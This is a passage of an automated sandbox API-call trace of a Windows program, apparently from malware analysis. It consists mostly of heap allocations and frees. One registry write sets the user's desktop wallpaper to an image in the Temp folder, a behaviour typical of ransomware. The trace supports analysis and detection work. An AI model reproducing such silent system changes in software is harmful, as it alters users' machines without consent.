dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0304.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0304.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0304.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0304.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0304.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0304.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0304.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0304.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0304.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0304.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0304.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0304.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0304.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0304.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0304.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0304.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0304.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0304.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0304.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0304.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0304.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0304.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0304.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0304.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0304.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0304.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0304.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0304.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0304.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0304.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0304.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0304.237] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0304.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0304.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0304.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0304.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0304.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0304.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0304.238] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0304.238] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0304.238] RegCloseKey (hKey=0x294) returned 0x0 [0304.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0304.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0304.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0304.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0304.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0304.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0304.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0304.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0304.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0304.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0304.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0304.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0304.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0304.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0304.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0304.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0304.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0304.240] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0304.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0304.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0304.240] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0304.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0304.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0304.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0304.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2bb8 [0304.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0304.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0304.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0304.241] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0304.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0304.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0304.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0304.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0304.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0304.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0304.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0304.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0304.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0304.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0304.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0304.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0304.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4d8 [0304.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0304.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0304.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0304.242] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0304.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0304.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0304.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0304.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0304.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0304.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0304.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0304.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0304.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0304.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0304.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0304.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0304.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0304.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0304.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0304.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0304.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0304.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0304.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0304.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0304.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0304.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0304.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0304.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0304.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0304.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0304.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0304.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0304.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0304.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0304.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0304.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0304.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0304.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0304.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0304.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0304.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0304.246] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0304.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0304.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0304.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0304.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0304.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0304.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0304.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0304.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0304.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0304.247] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0304.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0304.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0304.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0304.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0304.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0304.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0304.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0304.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0304.248] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0304.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0304.248] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0304.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0304.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0304.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0304.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0304.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0304.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0304.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0304.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0304.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0304.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0304.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0304.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0304.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0304.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0304.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0304.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0304.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0304.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0304.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0304.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0304.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0304.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0304.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0304.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0304.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0304.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0304.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0304.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0304.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0304.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0304.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0304.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0304.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0304.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0304.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0304.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0304.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0304.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0304.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0304.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0304.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0304.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0304.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0304.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0304.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0304.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0304.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0304.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0304.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0304.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0304.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0304.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0304.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0304.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0304.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0304.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0304.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0304.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0304.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0304.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0304.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0304.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0304.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0304.252] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0304.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0304.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0304.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0304.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0304.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0304.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0304.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0304.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0304.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0304.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0304.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0304.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0304.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0304.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0304.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0304.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0304.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0304.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0304.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0304.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0304.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0304.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0304.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0304.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0304.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0304.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0304.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0304.254] RtlAllocateHeap (HeapHandle=0x25c0000, 